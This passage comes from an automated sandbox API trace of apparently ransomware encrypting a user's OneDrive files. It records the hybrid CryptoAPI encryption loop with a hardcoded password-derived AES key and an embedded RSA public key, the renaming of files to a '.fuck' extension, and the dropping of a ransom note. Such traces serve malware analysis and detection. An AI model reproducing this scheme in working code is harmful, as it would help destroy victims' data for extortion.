pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.165] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.165] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.166] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.166] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.167] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.167] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.168] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.168] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0274.169] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0274.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0274.169] CloseHandle (hObject=0x5d3c) returned 1 [0274.169] CloseHandle (hObject=0x5d48) returned 1 [0274.169] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0274.178] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0274.179] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0274.181] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0274.183] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0274.183] CryptDestroyKey (hKey=0x2faac8) returned 1 [0274.183] CryptReleaseContext (hProv=0x2f29750, dwFlags=0x0) returned 1 [0274.183] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0274.183] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0274.184] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\readme_back_files.htm")) returned 0xffffffff [0274.184] AreFileApisANSI () returned 1 [0274.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28896f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0274.184] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.185] GetFileType (hFile=0x5d4c) returned 0x1 [0274.185] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0274.186] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.187] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0274.187] GetLastError () returned 0x0 [0274.187] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappblue.png")) returned 0x20 [0274.188] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png", dwFileAttributes=0x80) returned 1 [0274.188] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappblue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.189] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\elevatedappblue.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.191] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ElevatedAppBlue.png.gsg", dwFileAttributes=0x2) returned 1 [0274.192] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0274.194] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0274.194] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.194] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.194] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0274.194] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.194] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0274.194] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f28c28) returned 1 [0274.195] CryptImportPublicKeyInfo (in: hCryptProv=0x2f28c28, dwCertEncodingType=0x1, pInfo=0x2f347f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34820*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34828*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fae08) returned 1 [0274.195] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0274.195] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29750*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f29750*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0274.195] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f29750*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f29750*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0274.196] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.200] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.201] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.202] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0274.203] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0274.203] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, 